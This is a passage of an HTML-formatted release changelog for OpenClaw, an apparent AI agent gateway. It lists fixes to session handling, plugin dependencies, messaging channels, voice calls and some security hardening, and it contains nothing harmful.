<p>Gateway/sessions: keep session-store reads from running stale prune and entry-count cap maintenance during startup, so oversized stores no longer block chat history readiness after updates while writes and <code>sessions cleanup --enforce</code> still preserve the cleanup safeguards. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307434486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70050/hovercard" href="https://github.com/openclaw/openclaw/issues/70050">#70050</a>. Thanks @tangda18.</p>
</li>
<li>
<p>Security/audit: keep plain <code>security audit</code> on the cold config/filesystem path and reserve plugin runtime security collectors for <code>--deep</code>, so large plugin installs cannot execute every plugin runtime during routine audits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: merge configured media-understanding providers such as Deepgram into partial active provider registries, so follow-up voice turns keep transcribing after another media plugin is already active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251059736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65687" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65687/hovercard" href="https://github.com/openclaw/openclaw/issues/65687">#65687</a>. Thanks @OneMintJulep.</p>
</li>
<li>
<p>WhatsApp: stage <code>qrcode</code> through root mirrored runtime dependencies so packaged QR pairing can render from staged plugin-runtime-deps installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362623764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75394" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75394/hovercard" href="https://github.com/openclaw/openclaw/issues/75394">#75394</a>. Thanks @FelipeX2001.</p>
</li>
<li>
<p>Discord/voice: apply per-channel Discord <code>systemPrompt</code> overrides to voice transcript turns by forwarding the trusted channel prompt through the voice agent run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077930512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47095/hovercard" href="https://github.com/openclaw/openclaw/issues/47095">#47095</a>. Thanks @qearlyao.</p>
</li>
<li>
<p>Discord/native commands: send component-only interaction replies from slash command and status handlers instead of treating renderable Discord components as an empty response. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Slack/slash commands: send block-only slash command replies instead of dropping Slack block payloads with no plain-text fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Telegram/messages: derive fallback text from interactive button/select labels before sending button-only payloads, so Telegram replies are not rejected as empty messages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>LINE/messages: send quick-reply-only payloads with fallback option text instead of accepting the payload and returning an empty delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Auto-reply/docking: require <code>/dock-*</code> route switches to start from direct chats, so group or channel participants cannot reroute a shared session's future replies into a linked DM. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep text-DM main-session route updates pinned to the configured DM owner, matching component interactions so another direct-message sender cannot redirect future main-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Mattermost/Matrix: keep direct-message main-session route updates pinned to the configured DM owner so paired or temporarily allowed senders cannot redirect future shared-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep SecretRef-backed bot tokens discoverable for message actions without resolving the token during schema generation, and resolve scoped channel SecretRefs before outbound agent message sends even when the tool is built from a config snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362174273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75324" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75324/hovercard" href="https://github.com/openclaw/openclaw/issues/75324">#75324</a>. Thanks @slideshow-dingo and @Conan-Scott.</p>
</li>
<li>
<p>Updates: run package post-install doctor repair with the managed Gateway service profile and state paths when a daemon is installed, so shell/profile mismatches no longer repair the caller state while the restarted Gateway keeps stale config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Models/DeepInfra: declare DeepInfra manifest catalog discovery and derive its runtime fallback catalog from the manifest, restoring provider-filtered <code>models list --all --provider deepinfra</code> rows without duplicated static model data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>CLI/update: verify managed gateway restarts against the installed service port instead of the caller shell port, so package updates do not report a healthy daemon as failed when profiles use different gateway ports. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/agent: reject strict <code>openclaw agent --deliver</code> requests with missing delivery targets before starting the agent run, so users do not wait for a completed turn that cannot send anywhere. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Setup/import: honor non-interactive <code>--import-from</code> onboarding flags by running the migration import path instead of silently completing normal setup without importing anything. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: run voice-channel turns under a voice-output policy that hides the agent <code>tts</code> tool and asks for spoken reply text, so <code>/vc join</code> sessions synthesize and play agent replies instead of ending with <code>NO_REPLY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208687812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61536" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61536/hovercard" href="https://github.com/openclaw/openclaw/issues/61536">#61536</a>. Thanks @aounakram.</p>
</li>
<li>
<p>Doctor/plugins: keep plain <code>doctor --non-interactive</code> from installing bundled plugin runtime dependencies, so headless health checks report missing deps while <code>doctor --fix</code> remains the explicit repair path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/gateway: require an interactive confirmation before installing or rewriting the Gateway service, so <code>doctor --fix --non-interactive</code> can repair plugin/config drift without replacing the operator's launchd/systemd service from a temporary environment. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: include packaged OpenClaw identity in bundled plugin loader cache keys, so same-path package upgrades stop reusing stale versioned runtime-deps mirrors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357604708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75045" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75045/hovercard" href="https://github.com/openclaw/openclaw/issues/75045">#75045</a>. Thanks @sahilsatralkar.</p>
</li>
<li>
<p>Plugin SDK: restore reply-prefix and reply-pipeline helpers on the deprecated root/compat SDK surface so external plugins still using <code>openclaw/plugin-sdk</code> do not fail message dispatch after update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359892122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75171/hovercard" href="https://github.com/openclaw/openclaw/issues/75171">#75171</a>. Thanks @zhangxiliang.</p>
</li>
<li>
<p>Plugins/runtime-deps: prune inactive same-package versioned runtime-deps roots after bundled dependency repair, so upgrades do not leave old <code>openclaw-&lt;version&gt;-&lt;hash&gt;</code> package caches behind after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: prune legacy version-scoped plugin runtime-deps roots during bundled dependency repair and cover the path in Package Acceptance's upgrade-survivor matrix, so upgrades from 2026.4.x no longer leave stale per-plugin runtime trees after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep Gateway startup plugin imports and runtime plugin fallback loads verify-only after startup/config repair planning, so packaged installs no longer spawn package-manager repair from hot paths after readiness. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @brokemac79 and @xiaohuaxi.</p>
</li>
<li>
<p>Plugins/runtime-deps: treat package.json runtime-deps manifests as supersets when generated materialization metadata is absent, so bundled plugin activation stops restaging already-installed dependency subsets on every activation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362879118" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75429" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75429/hovercard" href="https://github.com/openclaw/openclaw/issues/75429">#75429</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362889795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75431/hovercard" href="https://github.com/openclaw/openclaw/pull/75431">#75431</a>) Thanks @loyur.</p>
</li>
<li>
<p>iMessage: add stdin write callback and error listener to IMessageRpcClient so async EPIPE from a closed child process rejects the pending request instead of crashing the gateway with uncaughtException. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>MCP/stdio: settle MCP stdio transport send() from the write callback instead of resolving immediately on buffer acceptance, so async write errors reject the promise instead of being lost. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>Process/exec: add stdin error listener in runCommandWithTimeout so EPIPE from a prematurely-exited child is swallowed instead of escaping to uncaughtException. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>Voice Call/realtime: add default-off fast memory/session context for <code>openclaw_agent_consult</code>, giving live calls a bounded answer-or-miss path before the full agent consult. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329662019" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71849/hovercard" href="https://github.com/openclaw/openclaw/issues/71849">#71849</a>. Thanks @amzzzzzzz.</p>
</li>
<li>
<p>Google Meet: interrupt Realtime provider output when local barge-in clears playback, so command-pair audio stops model speech instead of only restarting Chrome playback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346767837" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73850/hovercard" href="https://github.com/openclaw/openclaw/issues/73850">#73850</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346567653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73834" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73834/hovercard" href="https://github.com/openclaw/openclaw/pull/73834">#73834</a>) Thanks @shhtheonlyperson.</p>
</li>
<li>
<p>Gateway/config: cap oversized plugin-owned schemas in the full <code>config.schema</code> response so large installed plugin sets cannot balloon Gateway RSS or crash schema clients. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/update: skip ClawHub and marketplace plugin updates when the bundled version is newer than the recorded installed version, so <code>openclaw update</code> no longer overwrites working bundled plugins with older external packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363046993" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75447/hovercard" href="https://github.com/openclaw/openclaw/issues/75447">#75447</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Gateway/sessions: use bounded tail reads for sessions-list transcript usage fallbacks and cap bulk title/last-message hydration, keeping large session stores responsive when rows request derived previews. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/sessions: yield during bulk transcript title/preview hydration and copy compaction checkpoints asynchronously, keeping the Gateway event loop responsive for large session stores and large transcripts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362222686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75330" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75330/hovercard" href="https://github.com/openclaw/openclaw/issues/75330">#75330</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362708402" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75414" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75414/hovercard" href="https://github.com/openclaw/openclaw/issues/75414">#75414</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Gateway/sessions: stream bounded transcript reads for session detail, history, artifacts, compaction, and send/subscribe sequence paths so small Gateway requests no longer materialize large transcripts or OOM on oversized session logs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/chat: bound chat-history transcript reads to the requested display window so large session logs no longer OOM the Gateway when clients ask for a small history page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>BlueBubbles: detect audio attachments by Apple UTIs (<code>public.audio</code>, <code>public.mpeg-4-audio</code>, <code>com.apple.m4a-audio</code>, <code>com.apple.coreaudio-format</code>) in addition to <code>audio/*</code> MIME, so iMessage voice notes whose webhook payload only carries the UTI are now classified as audio in the inbound <code>&lt;media:audio&gt;</code> placeholder instead of falling through to the generic <code>&lt;media:attachment&gt;</code> tag. Thanks @omarshahine.</p>
</li>
<li>
<p>Voice Call/Twilio: honor stored pre-connect TwiML before realtime webhook shortcuts and reject DTMF sequences outside conversation mode, so Meet PIN entry cannot be skipped or silently dropped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Docs/sandboxing: clarify that sandbox setup scripts (<code>sandbox-setup.sh</code>, <code>sandbox-common-setup.sh</code>, <code>sandbox-browser-setup.sh</code>) are only available from a source checkout, and add inline <code>docker build</code> commands for npm-installed users so sandbox image setup works without cloning the repo. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363242333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75485" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75485/hovercard" href="https://github.com/openclaw/openclaw/issues/75485">#75485</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Google Meet/Voice Call: play Twilio Meet DTMF before opening the realtime media stream and carry the intro as the initial Voice Call message, so the greeting is generated after Meet admits the phone participant instead of racing a live-call TwiML update. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Google Meet/Voice Call: make Twilio setup preflight honor explicit <code>--transport twilio</code> and fail local/private Voice Call webhook URLs, including IPv6 loopback and unique-local forms, before joins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Voice Call/Twilio: retry transient 21220 live-call TwiML updates and catch answered-path initial-greeting failures, so a fast answered callback no longer crashes the Gateway or drops the Twilio greeting/listen transition. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353522708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74606" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74606/hovercard" href="https://github.com/openclaw/openclaw/pull/74606">#74606</a>) Thanks @Sivan22.</p>
</li>
<li>
<p>CLI/startup: preserve <code>OPENCLAW_HIDE_BANNER</code> banner suppression for route-first startup callers that rely on the default process environment while keeping read-only status/channel paths from repairing bundled plugin runtime dependencies. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>.</p>
</li>
<li>
<p>Voice Call/Twilio: register accepted media streams immediately but wait for realtime transcription readiness before speaking the initial greeting, so reconnect grace handling stays live while OpenAI STT startup is no longer starved by TTS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360162005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75197" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75197/hovercard" href="https://github.com/openclaw/openclaw/issues/75197">#75197</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361111739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75257" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75257/hovercard" href="https://github.com/openclaw/openclaw/pull/75257">#75257</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Voice Call CLI: run gateway-delegated <code>voicecall continue</code> through operation-id polling and protocol-shaped errors, so long conversational turns keep their transcript result without blocking a single Gateway RPC. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363097375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75459" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75459/hovercard" href="https://github.com/openclaw/openclaw/pull/75459">#75459</a>) Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Voice Call CLI: delegate operational <code>voicecall</code> commands to the running Gateway runtime and skip webhook startup during CLI-only plugin loading, preventing webhook port conflicts and <code>setup --json</code> hangs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331824729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72345" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72345/hovercard" href="https://github.com/openclaw/openclaw/issues/72345">#72345</a>. Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Agents/pi-embedded-runner: extract the <code>abortable</code> provider-call wrapper from <code>runEmbeddedAttempt</code> to module scope so its promise handlers no longer close over the run lexical context, releasing transcripts, tool buffers, and subscription callbacks when a provider call hangs past abort. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348625606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74182/hovercard" href="https://github.com/openclaw/openclaw/issues/74182">#74182</a>) Thanks @cjboy007.</p>
</li>
<li>
<p>Docker: restore <code>python3</code> in the gateway runtime image after the slim-runtime switch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357583202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75041" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75041/hovercard" href="https://github.com/openclaw/openclaw/issues/75041">#75041</a>.</p>
</li>
<li>
<p>Agents/session-repair: fix resumed sessions failing with repeated 400 errors on Anthropic and strict OpenAI-compatible providers (Qwen, mlx-vlm) after an interrupted conversation or blank user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361379280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75271" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75271/hovercard" href="https://github.com/openclaw/openclaw/issues/75271">#75271</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362043132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75313" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75313/hovercard" href="https://github.com/openclaw/openclaw/issues/75313">#75313</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>CLI/Voice Call: scope <code>voicecall</code> command activation to the Voice Call plugin so setup and smoke checks no longer broad-load unrelated plugin runtimes or hang after printing JSON. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/plugins: warn when restrictive <code>plugins.allow</code> is paired with wildcard or plugin-owned tool allowlists, making the exclusive plugin allowlist behavior visible before users hit empty callable-tool runs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174851981" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58009" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58009/hovercard" href="https://github.com/openclaw/openclaw/issues/58009">#58009</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245604493" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64982/hovercard" href="https://github.com/openclaw/openclaw/issues/64982">#64982</a>. Thanks @KR-Python and @BKF-Gitty.</p>
</li>
<li>
<p>Google Meet/Voice Call: keep Twilio Meet joins in conversation mode and reuse the realtime intro prompt when no voice-call-specific intro is configured, so answered phone bridge calls speak instead of joining silently. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Auto-reply/group chats: keep the <code>message</code> tool available for message-tool-only visible replies and apply group-scoped tool policy before deciding fallback delivery, so Discord/Slack-style rooms reply visibly in the correct channel after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355291678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74842/hovercard" href="https://github.com/openclaw/openclaw/issues/74842">#74842</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360452638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75207" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75207/hovercard" href="https://github.com/openclaw/openclaw/issues/75207">#75207</a>. Thanks @davelutztx and @aa-on-ai.</p>
</li>
<li>
<p>Agents/commitments: keep inferred follow-ups internal when heartbeat target is none, strip raw source text from stored commitments, disable tools during due-commitment heartbeat turns, bound hidden extraction queue growth, expire stale commitments, and add QA/Docker safety coverage. Thanks @vignesh07.</p>
</li>
<li>
